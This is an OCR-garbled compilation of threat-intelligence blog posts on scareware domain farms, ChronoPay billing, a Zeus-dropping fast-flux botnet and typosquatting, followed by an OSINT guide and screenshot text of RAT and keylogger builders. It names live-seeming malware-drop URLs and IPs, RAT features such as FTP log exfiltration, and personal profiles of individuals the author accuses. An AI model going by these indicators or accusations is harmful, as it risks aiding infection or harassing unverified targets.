goscanstar .com - Email: stgeyman@gmail.com 
goscanflex .com - Email: chirelgas@gmail.com 
goscanmany .com - Email: chirelgas@gmail.com 
scantrue6 .info - Email: jokinzer@gmail.com 
scantool6 .info - Email: jokinzer@gmail.com 
scanzoome .info - Email: jokinzer@gmail.com 
litescan6 .info - Email: litescan6.info 

truescan6 .info - Email: jokinzer@gmail.com 
toolscan6 .info - Email: jokinzer@gmail.com 


2009 Best AntiMalware/ Adware removal 


efficiency. 


Virus Kaspersky F-Secure ESET 
Shield Anti-virus Anti-Virus Nod32 


atomscan6 .info - Email: donboset@gmail.com 
genscan6 .info - Email: imendegal@gmail.com 
luxscan6 .info - Email: donboset@gmail.com 
wayscan6 .info - Email: jokinzer@gmail.com 
scanuser6 .info - Email: jokinzer@gmail.com 
scanway6 .info - Email: jokinzer@gmail.com 
scan6line .info - Email: jokinzer@gmail.com 
scan6note .info - Email: jokinzer@gmail.com 
scan6true .info - Email: jokinzer@gmail.com 
scan6tool .info - Email: jokinzer@gmail.com 
true6scan .info - Email: jokinzer@gmail.com 
tool6scan .info - Email: jokinzer@gmail.com 
top6scan .info - Email: jokinzer@gmail.com 
user6scan .info - Email: jokinzer@gmail.com 
list6scan .info - Email: jokinzer@gmail.com 


Webroot 
Antivirus 


BitDefender 
Antivirus 


Norton 
Antivirus 
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The simple, safe way to buy domain 
names 
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way6scan .info - Email: jokinzer@gmail.com 
scan6user .info - Email: jokinzer@gmail.com 
scan6list .info - Email: jokinzer@gmail.com 
scan6fix .info - Email: jokinzer@gmail.com 
scan6way .info - Email: jokinzer@gmail.com 


It’s pretty obvious case demonstrating the dynamics of the underground ecosystem. A 
thousand bogus accounts purchased for $10 used in a bulk registration of scareware serving 
domains on a revenue sharing affiliate model ends up in a win-win-win situation for the 
cybercriminals involved in these processes. The practice is becoming rather popular not only 
due to their interest in less centralization of the domain control under a single email address 
- cross checking reveals the entire portfolio managed under it - but due to the availability of 
the service. 


Items processed: $2 
= 
4 Local Ovsc (C) pe Local Dise (0) Shared Documents 
v Viruses found: 3 rv) a rv) enn 


@ security noernal 


Process: Safe Files scan 


System Information 


iP 208.83.22238 
Locations Uruted States 
OS: Linux 

Browser: Morilla 


Security status: Processing... 


Torepairyour system and get real « time protection, click “Protect Now". 


Attention! 
y™ It is recomreended that you install full real-time antivirus protection against external sttack for safe browsing 


clean-pc-now .net - 94.75.233.162 - Email: robertsimonkroon@gmail.com 
fast-spyware-cleaner .org - Email: robertsimonkroon@gmail.com 
spyware-scaner .com - Email: robertsimonkroon@gmail.com 
scan-pc-now .com - Email: robertsimonkroon@gmail.com 
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free-tube-porn .biz - Email: robertsimonkroon@gmail.com 
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softportal-extrafiles .com - 64.20.38.172 

exe-profile .com - Email: kimwerner92@yahoo.com 
extrafiles-softportal .com - Email: opipkl@googlemail.com 
softportal-files .com - Email: kimwerner92@yahoo.com 
softportal-extrafiles .com 
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An award-winning antvirus engine protects against computer 
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mycomputerscanner .com - Email: vanmullem@yahoo.com 


restricteddomainhelp .com - 83.133.124.81 - Email: franklinnig@yahoo.com 
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Your Purchase is Backed By Fully Secure & Encrypted Your Email Address and 
Our 30-DayMoney Back Ordering - Even Safer Personal Information are 
Guarantee! Than Over the Phone. private and NEVER resold. 


Thank you. Your transaction has been accepted. 


PLEASE PRINT! 
Thank you for the recent purchase Antivirus 360 software. 


THIS IS A ONE-TIME CHARGE. 

Product/Service ordered: License for Antivirus 360 

This charge will appear on your card statement as CHRPay.com/ducforceide 
ACTIVATION INFORMATION: 


Registration e-mail: 
Registration key: 


To register, start Antivirus 360 and click on Registration button. 
Please enter your registration e-mail and registration key to activate software. 
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Customer Support 
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These payment processing gateways are sometimes front-end to the original and often 
legitimate payment processors. In this particular case, the the legitimate processor is 
Netherlands-based ChronoPay, which is known to have been used in the past by affiliates in 
the scareware affiliate model in the past, with several complaints for repeated credit card 
billing, which in reality is included in the scareware’s Terms of Service. 


Upon a successful purchase - the customer is told that "This charge will appear on 
your card statement as CHRPay.com/ducforceide". Interestingly, Pandora Software has 
also been using the following ChronoPay accounts for over an year - Chrpay.com/meyrocorp; 
CHrpay.com/pnra using [2]disconnected numbers, CallerlD’s of [3]scareware operations, 
desperate attempts to contact the alias for [4]the front-end payment processor, ultimately 
resulting in [5]several hundred ChronoPay related complaints. 


Next to scareware, ChronoPay (Pavel Vrublevsky acting as CEO) is also known to have 
been used in [6]a mobile application scam dissected here, as well as being a victim of [7]a 
DDoS attack in 2008, which is pretty logical since if ChronoPay is the payment processor 
of choice for the hundreds of thousands of scareware generated revenues on daily basis, 
the commissions ChronoPay takes from cybercriminals would be more than welcome in the 
competing payment processor’s network. 
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33. http: //ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security.htm 
34. http: //ddanchev. blogspot .com/2007/12/diverse-portfolio-of-fake-security.htm 
. http: //ddanchev. blogspot. com/ 
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5.7.3 The Multitasking Fast-Flux Botnet that Wants to Bank With You 
(2009-07-07 07:28) 


Michael Jackson Was 


But Who Killed Michael Jackson? 


Run the file with secret information to see the killer's photos and details: 


x: file-Mjacksonskiter.exe 


From a Chase phishing campaign, to a [1]bogus Microsoft update, and an exploit serving 
spam campaign using a "Who Killed Michael Jackson?" theme prior to his death (go through 
related [2]Michael Jackson malware campaigns), to a currently ongoing phishing campaign 
impersonating the United Services Automobile Association (USAA), the gang behind this 
botnet has been actively multitasking during the past two months. 
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Critical Update 


Update for Microsoft Outlook / Outlook Express (KB910721) 


Please wait... 


Brief Description 


Microsoft has released an update for Microsoft Outlook / Outlook Express. This update ts critical and provides you with the latest 
version of the Microsoft Outlook / Outlook Express and offers the highest levels of stability and security. 


Quick Details 
e@ File Name: officexp-KB910721-FullFile-ENU.exe 
e Version: 1.4 
@ Language: English 
e@ File Size: 81 KB 


System Requirements 


© Supported Operating Systems: Windows 2000; Windows 98; Windows ME; Windows NT; Windows Server 2003; 
Windows XP; Windows Vista 


* This update applies to the following product: Microsoft Outlook / Outlook Express 


Contact Us 
@ 2009 Microsoft Corporation. All rights reserved. Contact Us | Terms of Use | Trademarks | Privacy Statement 


The spam message is as follows: 

"Michael Jackson Was Killed... But Who Killed Michael Jackson? Visit X-Files to see the answer: 
MJackson. kilijj .com/x-files", upon clicking on it the user is redirected to two exploit serving do- 
mains - ogzhnsltk .com/plugins/index.php (94.199.200.125 Email: osaltik@windowslive.com); 
and dogankomurculuk .com/stil/index.php (91.191.164.100 - Email: by.yasin@msn.com). 


Through the use of an Office Snapshot Viewer exploit the user is the exposed to a [3]down- 
loader (x-file-MJacksonsKiller.exe) which attempts to drop a copy of the Zeus malware from 
labormi .com/Ibrc/Ibr.bin (91.206.201.6). The following is an extensive list of the participating 
domains, as well as the currently active and fast-fluxing DNS servers part of the botnet: 
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Due to this botnet’s involvement with several other malware campaigns of notice, as 
well as its evident connection with the ongoing monitoring of several particular cybecrime 
groups, analysis and updates will be posted as soon as they emerge. 


Related posts: 

[4]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[5]Managed Fast Flux Provider - Part Two 

[6]Managed Fast Flux Provider 

[7]Storm Worm’s Fast Flux Networks 

[8]Fast Flux Soam and Scams Increasing 

[9]Fast Fluxing Yet Another Pharmacy Spam 

[10]Obfuscating Fast Fluxed SQL Injected Domains 

[11]Storm Worm Hosting Pharmaceutical Scams 

[12]Fast-Fluxing SQL injection attacks executed from the Asprox botnet 


This post has been reproduced from [13]Dancho Danchev’s blog. 


. http://blogs.zdnet .com/security/?p=3682 
ttp://www.virustotal.com/analisis/d654ce275154004c70d42d4cebc8437070e4988b2774075151e17b275165736a- 12469 
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Operating since [1]2008, the fraudulent [2]tactics applied by Soletto Group, S.A also known 
as Netlink Network Corp, greatly remind of those applied by [3]Interactive Brands also known 
as IBSOFTWARE CYPRUS; IB Softwares and most recently Euclid Networks Ltd - you have to 
appreciate the irony here since they too multitask on multiple fronts [4]through their official 
phone number since 2007 - in particular their massive typosquatted domain farms where 
they’d would change and repeatedly charge without permission once someone falls victim 
into the fraudulent practice. 
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BitDefender Antivirus 


>» Download: ExtDetender Antvirus 
>» Gate: 2000.04.06 

>» Tomato: 8241744 

>» Sine: Engaah 

»» Licence: Trial 


Description 


What Soletto Group, S.A or Netlink Network Corp (phone (0) 2071939823) does differently is 
the use of micro sms payment scam having operated the [5]SMS numbers 78881 and 81039 
in the past in order to offer a download service for legitimate software in the following way: 


"WARNING: ACCESS TO THE PREMIUM SERVICE SHALL REQUIRE SENDING ONE SMS PER 


DOWNLOAD, AND YOU WILL RECEIVE TWO SMS. THE PRICE OF EACH SMS IS THREE POUNDS 
EACH. TOTAL COST OF SERVICE SIX POUNDS." 


2406 


rON2ST3vEeiuBraJ j-V9-GxF9Raepfa3D1rv8lap4yr0V7rw_J1bYeohtT: 
127. https://blogger .googleusercontent . com/img/a/AVvXsEhfFUKvm7 Jhx2LOCTQUyUmQAZPegf- I1aZ4NSpctMBuT 10SvqCHF5T: 
mf SSycChuQ1izkt9CNE3RG1aRrEDbmdpF i JUnIahpILmmvITSGQcZoAibc 


128. https://blogger .googleusercontent .com/img/a/AVvXsEj j9_1ijphYMSY8TLzmYKUgU6R9DVum jW164yY2KicDesBNwOtscP69 


NstnRD5cGT2Yyu_bm-sgNhUNBUTeqzAzvc3HUnOtOL7 _GNizIIO5kS- 
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Avast! 4.8.1296.0 Server Edition 


is « Pentune® m 700 Mir / RAMe 
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Description 
Avast! Avast! 4.8.1296.0 Server Edition 


Don, offenng 


Who's typosquatted anyway? Pretty much each and every popular piece of software there is. 
From Kaspersky, NOD32, Malware Bytes, Avira, AVAST, BitDefender, to Firefox, BitTorrent, 
Microsoft Office, Winzip, Winrar, and Internet Explorer - for starters. 


Here’s a complete list of their domains farm, with hosting services courtesy of Rapidswitch 
Ltd: 
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18.7.14 How | Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang 
in Bulgaria? - Part Two (2022-07-25 04:20) 


Dear blog readers, 


Here’s the second part of my original "[1]How | Got Robbed and Beaten and Illegally Arrested by 
a Local Troyan Gang in Bulgaria?" post where I’m aiming to provide more actionable intelligence 
on the local people from my hometown in the city of Troyan Bulgaria responsible for my illegal 
arrest with stolen ID home molestation and illegal beating and kidnapping attempt. 


Feel free to approach them in case you’re interested in my whereabouts. 


| can be reached at +359 87 689 3890 or at dancho.danchev@hush.com 24/7 in case you’re 
interested in knowing more about my whereabouts. 


[2] 


[3] 
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[14] 
https://www.linkedin.com/in/nikolay-sabchev/ 
https://soundcloud.com/dj-kundalini 
https://www.facebook.com/NicolaySabchev 
https://soundcloud.com/dj-kundalini 


https://www.instagram.com/nicokundalini 
24060 


Stay tuned! 


. https: //ddanchev. blogspot .com/2020/12/how- i-got-robbed-and-beaten-and.htm 
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18.7.15 Basics of OSINT in the Context of Fighting Cybercrime - The Definite Begin- 
ner’s Guide (2022-07-26 20:04) 


Figure 2, Intelligence Discipline Integration 


[1] 


Dear blog readers, 


I’ve recently came up with an interesting article which I’ve decided to share with my blog 
readers where my idea is to inspire and motivate you to join the world of cybercrime fighting 
in the context of using OSINT which is a powerful tool and a concept in the ever ongoing fight 
against cybercrime internationally. 


“What use are they? They’ve got over 40,000 people over there reading newspapers.” - Presi- 
dent Nixon 


This introductory guide into the world of OSINT is part of an upcoming series of articles aiming to 
assist both novice and experienced security practitioners including analysts for the purpose of 
entering the world of OSINT for cybercrime research and aims to offer a high-profile and never- 
published before practical and relevant in today’s nation-state and rogue cyber adversaries 
Internet and cybercrime ecosystem whose purpose general overview and introductory material 
and training course material for novice beginners including advanced Internet users hackers 
security consultants analysts including researchers who are interested in exploring the world 
of OSINT (Open Source Intelligence) for the purpose of making a difference doing their work in 
a better and more efficient way including to actually be fully capable and equipped to catch 
the bad guys online including to monitor and track them down to the point of building the big 
picture of their fraudulent and rogue online activities. The course including the actual learning 
and training material is courtesy of Dancho Danchev who is considered one of the most popular 
security bloggers threat intelligence analysts and cybercrime researchers internationally and 
within the security industry. 


The primary purpose behind this guide is to summarize Dancho Danchev’s over a decade of 
active passive and active including actionable threat intelligence and OSINT research type of 
experience including cybercrime research type of experience where the ultimate goal would 
be to empower the student or the organization taking this course into better doing their online 
research work including to be fully capable of tracking down and monitoring the rogue and 
malicious online activities of the bad guys online where the ultimate goal would be to better 
position and enhance your cyber attack or malicious threat actor cyber campaign attribution 
skills ultimately improving your work activities and actually empowering you to learn how to 
do OSINT for good and most importantly to track down and monitor the bad guys. 


Introduction 
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In a world dominated by sophisticated cybercrime gangs and nation-state sponsored and toler- 
ated rogue cyber actors the use of OSINT (Open Source Intelligence) is crucial for building the 
big picture in the context of fighting cybercrime internationally including to actually "connect 
the dots" in the context of providing personally identifiable information to a closed-group and 
invite-only LE community including international Intelligence Agencies on their way to track 
down and prosecute the cybercriminals behind these campaigns. 


In this training and learning material Dancho Danchev one of the security industry’s most 
popular and high-value security blogger and cybercrime researcher will offer an in-depth peek 
inside the world of OSINT in the context of fighting cybercrime and will provide practical advice 
examples and case in particular on how he tracked down and shut down the infamous Koobface 
botnet and continued to supply never-published and released before potentially sensitive and 
classified information on new cyber threat actors which he continued to publish at his Dancho 
Danchev’s blog. 


Basics of OSINT 


OSINT in the context of fighting cybercrime can be best described as the systematic and persis- 
tent use of public information for the purpose of building a cyber threat intelligence enriched 
data sets and intelligence databases both for real-time situational awareness and historical 
OSINT preservation purposes which also include to actually "connect the dots" in cybercrime 
gang and rogue cyber actor campaigns and cyber attack type of campaigns. A general ex- 
ample would consist of obtaining a single malicious software sample and using it on a public 
sandbox to further map the infrastructure of the cybercriminal behind it potentially exposing 
the big picture behind the campaign and connecting the dots behind their infrastructure which 
would lead to a multi-tude and variety of personally identifiable information getting exposed 
which could help build a proprietary cybercrime gang activity database and actually assist LE 
in tracking down the prosecuting the cybercriminals behind these campaigns. 


"There’s no such thing as new cyber threat actors. It’s just new players adopting economic 
and marketing concepts to steal money and cause havoc online." 


The primary idea here is to locate free and public online repositories of malicious software and 
to actually obtain a sample which will be later on used in a public sandbox for the purpose of 
mapping the Internet-connected infrastructure of the cybercrime gang in question including to 
actually elabore more on the ways they attempt to monetize the access to the compromised 
host including possibly ways in which they make money including to actually find out what 
exactly are they trying to compromise. Possible examples here include VirusTotal or actually 
running a malware interception honeypot such as for instance a spam trap which would allow 
you to intercept currently circulating in the wild malare campaigns that propagate using email 
and actually analyze them in terms of connecting the dots exposing their Internet-connected in- 
frastructure and establishing the foundations for a successful career into the world of malicious 
software analysis and cybercrime research. 


"Everything that can be seen is already there". 


The next logical step would be to properly assess and analyze the recently obtained sample and 
to properly establish the foundation of a "connect the dots" culture within your organization 
where the primary goal would be to have researchers and analysts look for clues on their way 
to track down and monitor a specific campaign potentially coming up with new and novel cyber 
attack attribution research. Visualization is often the key to everything in terms of visualizing 
threats and looking for additional clues and possible cyber attack attribution clues where a 
popular visualization and threat analysis tool known as Maltego should come into play which 
basically offers an advanced and sophisticated way to process OSINT and cybercrime research 
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and threat intelligence type of information and actually enrich it using public and proprietary 
sources of information for the purpose of establishing the big picture and actually connecting 
the dots for a specific cyber attack campaign. 


Among the first things that you should consider before beginning your career in the World 
of OSINT is that everything that you need to know about a specific online event a specific 
online campaign that also includes the activities of the bad guys online is already out there 
in the form of publicly accessible information which should be only processed and enriched 
to the point where the big picture for a specific event or a malicious online campaign should 
be established using both qualitative and quantitative methodologies that also includes the 
process of obtaining access to the actual technical details and information behind a specific 
online event or an actual malicious and rogue online campaign. 


Among the few key things to keep in mind when doing OSINT including actual OSINT for cyber 
attack and cyber campaign attack attribution is the fact that in 99 % of the cases all the col- 
lection information that you need in terms of a specific case is already publicly known and is 
publicly accessible instead of having to obtain access to a private or a proprietary source of 
information and the only thing that you would have to do to obtain access to it is to use the 
World’s most popular search engine in terms of collection processing and enrichment. 


The second most popular thing to keep in mind when doing OSINT is that you don’t need to 
obtain access to proprietary even public OSINT tools. 


Current State of the Cybercrime Ecosystem 


In 2021 a huge number of the threats facing the security industry including vendors and orga- 
nizations online include RATs (Remote Access Tools) malicious software part of a larger bother 
malicious and fraudulent spam and phishing emails including client-side exploits and vulner- 
abilities which have the potential to exploit an organization or a vendor's end points for the 
purpose of dropping malware on the affected host including the rise of the ransomware threat 
which is basically an old fashioned academic concept known as cryptoviral extortion. 


With more novice cybercriminals joining the underground ecosystem market segment largely 
driven by a set of newly emerged affiliate based revenue sharing fraudulent and malicious 
networks offering financial incentive for participation in a fraudulent scheme it shouldn’t be 
surprising that more people are actually joining the cybercrime ecosystem potentially causing 
widespread damage and havoc online. 


With cybercrime friendly forums continuing to proliferate it should be clearly evident that more 
people will eventually join these marketplaces potentially looking for new market segment 
propositions to take advantage of for the purpose of joining the cybercrime ecosystem and that 
more vendors will eventually continue to occupy and launch new underground forum market 
propositions for the purpose of promoting and looking for new clients for the services. 


In a World dominated by a geopolitically relevant Internet cybercrime ecosystem it shouldn’t 
be surprising that more international cybercrime gangs will eventually continue to launch new 
fraudulent and malicious spam and phishing campaigns that also includes malicious software 
Campaigns for the purpose of earning fraudulent revenue. 


With more affiliate based underground market segment based networks aiming to attract new 
uses where they would forward the risk for the actual infection process and fraudulent transac- 
tion to the actual user in exchange for offering access to sophisticated bulletproof infrastructure 
including advanced and sophisticated malware and ransomware releases it shouldn’t be sur- 
prising that more people are actually joining these affiliate networks for the purpose of earning 
fraudulent revenue in the process of causing havoc and widespread disruption online. 
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In this brief Basics of OSINT in the context of fighting cybercrime article we provided a general 
overview of the process of using OSINT for cybercrime fighting purposes and we hope that you 
enjoyed the article and will be eager to go through the second part of the article series which 
will be published at our Web site in the coming weeks. 


Stay tuned! 


1. https: //blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEhqsB9Mkdzc91AzP2SOUGHFpXHVBzDszVf ev7£WC4aPW_Iv 
R4UBemNvoHpnqJwFmnHhA66i3PsBwN11FMNAT1VQ6t42qsHuilf-X_ 


18.7.16 Introducing WhoisXML API’s WHOIS Conclave Law Enforcement IoCs and Re- 
search on Demand Threat Intelligence Feed! (2022-07-29 16:16) 


Dear blog readers, 


| wanted to take the time and effort and present my latest project with WhoisXML API my 
employer where I’m currently acting as a DNS Threat Researcher which is a Law Enforcement 
loCs and threat intelligence feed including research and reports service on demand service 
which you can apply for [1]here. 


Feel free to approach me at research@whoisxmlapi.com in case you’re interested in applying 
for access or just have a general question about the service including sales@whoisxmlapi.com 
in case you’re interested in applying for access or want to inquire about obtaining access to 
the service. 


Sample screenshots: 
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[73: MX, DNS] 
[74: MX, DNS] 
[75: MX, DNS] 
[76: MX, DNS] 
[77: MX, DNS] 
[78: MX, DNS] 
[79: MX, DNS] 
[80: MX, DNS] 
[81: MX, DNS] 
[82: MX, DNS] 
[83: MX, DNS] 
[84: MX, DNS] 
[85: MX, DNS] 
[86: MX, DNS] 
[87: MX, DNS] 
[88: MX, DNS] 
[89: MX, DNS] 
[90: MX, DNS] 
[91: MX, DNS] 
[92: MX, DNS] 
[93: MX, DNS] 
[94: MX, DNS] 
[95: MX, DNS] 


[4] 


[5] 


ucla.edu 
unicode.org 
update-firefox.com 
vide04flash.com 
vide1flash2.com 
wellpartner.com 
www .linux.org.uk 
wxdownloadmanager.con 
xx.dk 
yahoo-inc.com 
youasdr3.com 
youtb3.com 
youtube2.com 
youtube3.com 
youtube7.com 
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youtubespeedup.com 
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ares-2009 .net 
ares-net .org 
avira-net .info 
bitcomet-plus .info 
bitorrent .cc 
bittorrent-net .info 
bittorrent-plus .info 
direct-x .cc 
divx-player-plus .info 
e-mule .nu 
elisoft-plus .info 
emule-2008 .net 
emule-proyect .info 
emulenet .net 
iexplorer-full .info 
iphonefull .com 
javaruntime .net 
lyrics2 .me 
malware-bytes .info 
mediaplayer-full .info 
mediaplayer-plus .info 
mesengerplus .org 
messenger-9 .net 
messenger-plus .net 
messenger-soft .info 
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Welcome to the community-driven and commercial WhoisXML AP! 
OpenCTI instance where we aim to offer a novel and unique peek 
inside the modern threat landscape on a daily basis through the 
machine-readable communication of novel attack techniques 
including TTPs (Tactics Techniques and Procedures) including all 
the relevant and real-time processed loCs (Indicators of 
Compromise) for current and ongoing cyber attack campaigns and 


currently circulating malicious software spam and phishing 
campaigns spreading rogue and fraudulent online campaigns. 
Inquire about your API key here - https://threat- 
intelligence.whoisxmlapi.com/nautilus-feed or send a message to 
research@whoisxmlapi.com 


Stay tuned! 


1. https://threat-intelligence.whoisxmlapi.com/whois-conclave 

2. https: //blogger. googleusercontent .com/img/b/R29vZ2x1/AVVXsEhGVAw220SWt6uBr37 - pPm9Adg-K2Dc2C3FOVSxaGIB1JkC5 
b3G- ZaVkR3mx2J11h11LXAJmN- 1p2BsnycMpNLfk JwQa6qqdho8gwE 

3. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEgU3eBPEz j b6BVr1 vhKZbUrqA0E45x9PXBW4aQ1sWF 1hK-ok 
3SaJym1Y- J3nHyR16roGdU1zRYDOKDFK4DHSwSKKTipDi3W869nBITM 

4. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEjz0uw957 j 8vN4MQZ4Q7Um-DdRonIT7KAcLmexAaBXkn89v J 
SKwkORuPNSfRDJ1x0ONc1c7Ti4-RJeZnPTo-ts1E181D0jChPb8kKgw6 

5. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEiC5TBG_1BmxUsfmAst Vf lifFA5S3dcaVB6pV2X131IhZSFX 
gwJdSPZMRKoQxMCnBGEwrD6x1TdbpUwzySexXcZWxMND6tf£N8ezWoN 

6. https: //blogger .googleusercontent .com/img/b/R29VZ2x1/AVVXsEhMT07 43 JM9XogEDQcPuTQsq404Chz6Q-F1mR9iilBsetoBo 
4H_177hJ5eyE4dYOnNkm6kopbsMSuwv[hV2LVvjs- jHFiriWCy9gT1 

7. https: //blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEhHEzYSUhunknUbx j ikASoDwy j toV3Xwu9QnpP13rgS-IL51 
YLpjYh_43sMyc-Qae3zaEHtBm9dz7d1-cppGpt 9hol VnRwPS6BCEFK 

8. https: //blogger. googleusercontent .com/img/b/R29vZ2x1/AVvXsEh2mEPaJ1QmRFi-DusdJcXJULw-mxeilXgIx2exj0JDf jAqD 
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18.7.17 Shots from the Wild West - Sample Compilation of RATs (Remote Access 
Tools) and Trojan Horses Screenshots - An OSINT Analysis - Part Two 
(2022-07-30 02:18) 


Dear blog readers, 


I’ve decided to share with everyone a personal compilation portfolio of currently and historically 
active RATs (Remote Access Tools) and trojan horses for the purpose of improving everyone’s 
situational awareness including to improve your technical collection skills and capabilities. 


Sample screenshots: 


Ke Server Builders: 
General Settings | Options | Registry | Advanced | Create 


Informations 


Host Name: Test 

DNSAP is: 127.0.0.1 Port 
Desable Firewall: No 
Offligne keyloging: no 
Auto Run 

Path to Run: C:WVINDOYVS\system32 
Spread Usb: No 

Spread Msn: No 

Spread P2P: No 

Met Server: No 
Gathering Informations 


Opening The Server ===> D 
Adding Information 


[2] 
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BB Lost Door ® ¥3.1 [Special Edition) 
© start listening | TS Creat Server B® stop listening| 


ei —),C =), == 


2 (4 About & Contact 


User : Administrateur Connected Hosts :[ 0] 


[3] 


[4] 
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KA |p 


) STEAMSTEALER 


‘Collecting Webhost: 
http: ““yourhost.com“captcha. php 


BU SERVER 


HTTP :##K4R4MBLE.CLOGSPOT.COM 


[6] 


Lost Door ® v 4.0 Pros. 


Sin Main Board News 
2 Connection About 
Files 
3 c ation @ Start Listening Stop Listening 
Misc 
®, Yokume control 


+) Port: 2185 
[00:00:58] Lost Door Started 
[00:01:06] listening Started on port 2185 


f) PC Information [00:01:38] Winsock is Getting connection request 
- [00:01:38] Test Connected 

_ : [00:01:43] Connection Established with Test 

> Passwords 7 


@) TExplorer 


« Clipboard 

& System 

it Graphics & Sounds 
&, Screen Shot 
2 CamCapture 
$2 Miro Spy 

Gf Server Settings 

® Extra 


3 Contact Curent User : Administrateur 


Reverse Connected with Test Online Host (5): [1] 


[7] 
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Exmanoize 


[8] 


Browsers Traffic: Loads Percent 


Exmanoize 


[9] 
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Antivirus Yersion Update Result 


antivir [6.30.05 03.04.2005 [no virusfound | 
ayvG 78 03.04.2005 ino virus found 
BitDefender {7-0 «03.06.2005 inovirusfound 
Drweb 4.32b 0 03.06.2005 inovirusfound 


[10] 


Xerver Remote Administration Tool Statistics 


ea Current Servers: 4 
Add New 


Local Host 


Server Event Log 


(7:06: 17 PM) Settings Loaded... 
School 


Hayward 


Xerver Remote Administration Too! Ready... Version 1 BETA 


[12] 
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Tracking Done 


Informations Details 

@ country : FRANCE 
Region : ILE-DE-FRANCE 

BE city : PARIS 
fy} Latitude/Long.: 2.3449 
G Time Zone : +01:00 
Gis Net Speed : DSL 
@ 1sP : PROXAD } FREE SAS 
YE Domain : PROXAD.NET 


Editserver for Lttlogger 1.0 SEE 


FTP settings Loofile Options 


Registry name —_| Microsoft notify 
Exe name 


Melt server 


If melt server enabled the server file will be 
melted when user opens the file 


[14] 
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Editserver for Lttlogger 2.0 (2005) 


Usemame opense 
Password rules 


FTP port 24 
FTP host/ip ftp.lycos.co.uk 


[ |Normal [@| Create dir [Recommanded] 


Folderon FTP sy 
Check FTP 


//Create? //Abouté? 


Move you mouse cursor over a textbox, help will 
be displayed -HERE- 


[15] 


) % Blade Runner version 0.50 alpha 


as om 


TAB "AIL-TAB OFF | 
vik z (Bi Real time capturing = - Alt-TAB OFF | 
BS) ast ips 
jo| | jo | fo) | A ‘al 
e) | 2) Lgl el) © ‘ 
[16] 
" Network Shutdown v1.0 (e felx) 
;- Connection 7 7 Reboot 
Address: [ Windows 95 
[ Windows 98 
Connect Disconnect 
| [ Windows ME 
The server MUST be open for you to be [ Windows 2000 
— to connect to the computer you are I Windows XP | 
trying to shutdown. | 
Results ~ » Options~ 
[~ Hide Server 
[ Show Server 
[ Autostart Enabled 
[ Autostart Disabled 


[17] 
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Connect 


IP-scan 


About 


Disconnect 
Too! Versia 
No big update, jus 


2 frew version. A 


for sere 


s like, reme 
e out to 


Server Invisible] 


MSN Pwd 


Hide 


[18] 
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Found 
Please E 


Here 


Pacnan Eats 


Pacran Eats 


If the connection 


1 tak 


Rnd Mouset 


Show Taskbar 


Portscanner 


write error 


printer manager 


registries 
= edi 


func: TTreeView 


- i iil Origin: 3, 78; Siz 
open Tab Stop: True; ! 
ie spy = 


<> spy control 


q 7 


00:00:00 


— icq spy 


+ msn spy 
+ ie spy v 


uReady... 


[19] 


a bug 


ben Program 


Open URL 


Keyboard 


Mouse 


Crash 


CORp 
Eat Memory Hide tracks 


Constant Error  6666é6dirs 


flip screen 


system sabotag 


dialups 
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Avira 


Poderoso antivirus que ofrece una efectva peoteccion contra virus y 


AntiVir Personal 8.1.0.367 


Spywares Que mo ralernza tu Oroenacor 


» Fecha: 2008-09-04 

» Lenguaje: tog 

» Tamafio: 22005704 bytes 

« Requisines minimes: Pectun® 8 700 whz/ Raw 125. U5 

« Requisines recemendades: Peetun@ Nv 17 Ghz RAM: S12 WS 
« Licemcia: freeware 


" Desee Consigue la ultima versi6n 


Descripcién - Avira AntiVir Personal 


Avira AntiVir Personal 8.1.0.367 


S been mternet parece una red armugadle de nnummeradies COGONES 1 AIDOS@vEs tambien 
POSER UN COSLIGS NO LAN Bp aSable POSUIO Cel Consiarie SurgeTMENtS O8 Virus BOyanes y OFC 
800 de elementos que buscan vuinerar ty PC con @ ureco fin de DequaKcar ef Suncom armerto 


et ststema 


Poderoso antvirus que ofece una efectva protecoon contra vrus ) spywares que no raiertza 
fy ordenador, @s Geo mo perderas la potencia de ts CPU y garaniza varias actuaivacones 


aunas 


Caractenstcas 


+ Detects y 
+ Scaneay 


© Provee EroteCOon Contra POINOS. QuEaNes » muchos C&OS Drogranas Que Dusan atacar ty 


pe 


femueve Mas de 150 000 virus 
fepara macro Virus 


+ Fact stusizacon Ge la base de virus en pocos pasos 


Esta versisn cuenta con una interminadie lista Ge Comecosones, Carnmies y Novedades Que 


mejoran notatemente Su funconarrmerto 


moviemaker-plus .info 
msn-messenger-9 .net 
msn-messenger-9 .org 
nero-2008 .com 
nerohome .net 

nod-32 .net 
nod32-net .info 
office2007-ful |.info 
openoffice-plus .info 
photoscape-plus .info 
photoscapesoft .info 
pspvideo9 .info 
sorpresor .com 
spybotsearch-full .info 
utorrent-net .info 
virtualdj-soft .info 
vic-full .info 

vvinrar .com 
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[25] 
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TP: 7) 
Porti[a 7 Change | 
AE Connect | 


G) Send Message | 
[7 File Manager | 


Reset password list | 
4 Custom | 


? About... | 
—Savetist (7 exit | 


erver's answers 


BoyFriend (client) started. Version: 1.35 
downloaded from OPENSC,CIB,NET 
RIP ME 


[27] 
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Save list | 


erver's answers 


BoyFriend (client) started. Yersion: 1.35 
downloaded from OPENSC,CIB,NET 
RIP ME 


[28] 
- Connection View 
File Options Help 


Transfer View 
Window View 


File Manager 
Process Manager 
Registry Editor 
Service Manager 


Network 
Remote Shell 


Audio Capture 
Webcam Capture 


Copy IP 


[29] 


IP: 7| 
Porti|g 7 Change | 
AE Connect | 


G) Send Message | 
["j File Manager | 
Reset password list | 
é Custom | 

? About... | 
[4 exit | 


24089 


3% © ~DP2D9.txt - Notepad Joey 
[Fle "Edk Format View Help 
This 4s Filel. This is File 2. 


[30] 


Denial Client (127.0.0.1) q - (5) x} 
[ Managers Transfers | Information | Config Serv | 


File | Regeditor | Process | 
C Webcam (ish -—— 
(* Screen 


Start | 
Stop | 
Single Pic| 


Quality ; 


| Save pic 


a 


1127.0.0.1 2864 [Transfer 0 Byte 


[31] 
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* Arabian-Attacker v1.2.0 (Efe \fx) 


Listen on: 1800 

Transfer Port: a ] 

Pawo | [— ~~) Hide 
© Standard Language 


Englch.ii y| 


[¥] Balloontip Notification 
